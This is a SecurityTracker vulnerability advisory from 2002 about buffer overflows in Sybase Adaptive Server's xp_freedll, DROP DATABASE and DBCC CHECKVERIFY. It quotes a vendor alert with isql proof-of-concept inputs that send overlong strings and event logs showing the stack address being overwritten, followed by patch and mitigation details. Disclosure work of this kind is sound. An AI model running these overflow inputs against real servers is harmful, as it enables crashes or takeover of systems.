Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Sybase Adaptive Server Buffer Overflows Let Local or Remote Authenticated Users Gain Root Privileges
|
|
SecurityTracker Alert ID: 1005721 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Nov 27 2002
|
Impact: Execution of arbitrary code via local system, Execution of arbitrary code via network, Root access via local system, Root access via network
|
Fix Available: Yes
Vendor Confirmed: Yes
|
Version(s): 12.0, 12.5
|
Description: Several buffer overflow vulnerabilities were reported in the Sybase Adaptive Server. A local or remote authenticated user can gain root privileges on the system.
Application Security, Inc. reported that there are buffer overflows in the xp_freedll extended stored procedure, the built-in function
DROP DATABASE, and the built-in function DBCC CHECKVERIFY.
An authenticated local or remote user can reportedly trigger an overflow
in the extended stored procedure xp_freedll to overwrite the stack and execute arbitrary code with the privileges of the server.
The procedure does not validate the length of a user-supplied argument (the name of the DLL to free). A demonstration exploit
transcript is provided in the Source Message.
An authenticated user can also trigger a buffer overflow in the DROP DATABASE built-in
function, as it does not validate the length of user-supplied input, according to Application Security, Inc.
A demonstration
exploit transcript using the SQL tool isql.exe is provided:
1> declare @test varchar(16384)
2> select @test = replicate( A ,
16384)
3> DROP DATABASE @test
4> go
The same type of flaw is reported in DBCC CHECKVERIFY built-in function. A demonstration
exploit transcript using the SQL tool isql.exe is provided:
1> declare @test varchar(16384)
2> select @test = replicate( A ,
16384)
3> DBCC CHECKVERIFY(@test)
4> go
For the full advisories prepared by Application Security, Inc., see the following URLs:
http://www.appsecinc.com/resources
/alerts/sybase/02-0001.html
http://www.appsecinc.com/resources/alerts/sybase/02-0002.html
http://www.appsecinc.com/resources/alerts/sybase/02-0003.html
|
Impact: An authenticated remote or local user can execute arbitrary code with root privileges.
|
Solution: The author of the report recommends that execute permissions on the xp_freedll procedure should be revoked from public.
The vendor
has also released the following patches:
12.5.0.2 - 11/14/2002
12.0.0.6 ESD#1 - 11/5/2002
The patches are available at:
http://downloads.sybase.com/swd/swx
|
Vendor URL: www.sybase.com/products/databaseservers/ase (Links to External Site)
|
Cause: Boundary error
|
Underlying OS: Windows (NT)
|
Reported By: "ASI Support" <support@appsecinc.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 27 Nov 2002 14:07:38 -0500
From: "ASI Support" <support@appsecinc.com>
Subject: ASI Sybase Security Alert: Buffer overflow in xp_freedll
|
Sybase Adaptive Server buffer overflow in xp_freedll extended stored
procedure
http://www.appsecinc.com/resources/alerts/sybase/02-0003.html
To determine if you should apply this hot fix, download AppDetective for
Sybase from http://www.sybasesecurity.net/products/appdetective/sybase/.
Risk level: High
Threat: Allows a non-privileged login to gain full control of the server
Versions Affected: Sybase Adaptive Server 12.0 and 12.5
Summary:
The extended stored procedure xp_freedll contains a buffer overflow that
may allow an attacker to overwrite the stack and execute arbitrary code
under the security context of the server. Execute permissions are
granted to public in the sybsystemprocs database on this extended stored
procedure.
Details:
Sybase Adaptive Server provides an extended stored procedure (ESP)
called xp_freedll in the database sybsystemprocs. This ESP is used to
release a DLL that has been loaded by another extended stored procedure.
Xp_freedll accepts a single parameter that is the name of the DLL to
free. Xp_freedll does not validate the length of the string passed into
the first parameter. It then attempts to copy an overly long string into
a small memory buffer. This memory copy results in the stack and the
stack pointer being overwritten with the buffer. Once the stack pointer
is overwritten, execution can be redirected to an arbitrary location in
memory and opcodes injected into the long string passed to the ESP can
be executed. This allows the attacker to run arbitrary code under the
security context of the extended stored procedure server.
Below is an example of overflowing the buffer using the SQL tool
isql.exe.
Memory corruption first occurs with a buffer of length 45.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Msg 11496, Level 16, State 7:
Procedure 'xp_freedll', Line 2:
Cannot read from site 'MRFREEZE_XP'. Please check the XP Server error
log file for detailed error description. (return status = -6)
With a buffer of 53 bytes in length, an exception is thrown.
1> xp_freedll 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.dll'
2> GO
Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp. If this
is an
user DLL check the code else contact Sybase Technical Support.
(return status = 1)
The following entries are recorded into the event logs.
11403: Encountered an exception(0) in ESP xp_freedll in DLL sybsyesp.
If this is an user DLL check the code else contact Sybase Technical
Support.
11403: Encountered an exception(193) in ESP xp_freedll in DLL
sybsyesp. If this is an user DLL check the code else contact Sybase
Technical Support.
11403: Encountered an exception(997) in ESP xp_freedll in DLL
sybsyesp. If this is an user DLL check the code else contact Sybase
Technical Support.
At 54 bytes in length, the follow memory locations appear in the event
logs:
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x696c6c not in pool in 'srv_senddone()' .
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x696c6c not in pool in 'srv_sendinfo()' .
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x696c6c not in pool in 'srv_sendstatus' .
At 55 bytes in length, the follow memory locations appear in the event
logs:
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x642e5858 not in pool in 'srv_senddone()' .
Notice that the memory location has been modified to include 5858 which
is the X we used in the buffer overflow.
As we continue to increase the buffer size, we see that the address is
completely overwritten by the buffer.
11451: MRFREEZE_XP: XP Server Error: 16142/10/1: Server process
address 0x58585858 not in pool in 'srv_sendstatus' .
Fix:
Execute permissions on the extended stored procedure xp_freedll in the
sybsystemprocs database should be revoked from public.
You should also apply the following patches:
12.5.0.2 - 11/14/2002
12.0.0.6 ESD#1 - 11/5/2002
These patches can be downloaded from http://downloads.sybase.com/swd/swx
Thank you,
support@appsecinc.com
Application Security, Inc.
phone: 212-490-6022
fax: 212-490-6456
-Protection Where It Counts-
----------------------------------------------------------------------
Application Security, Inc.
www.appsecinc.com
As pioneers in application security, we are an organization dedicated
to the security, defense, and protection of one of the most commonly
overlooked areas of security - the application layer. Application
Security, Inc. provides solutions to proactively secure (penetration
testing/vulnerability assessment), actively defend/monitor (intrusion
detection), and protect (encryption) your most critical applications.
----------------------------------------------------------------------
To unsubscribe from this list, send an email to
unsubscribe@appsecinc.com with the word "unsubscribe sybase" in the
subject list.
----------------------------------------------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
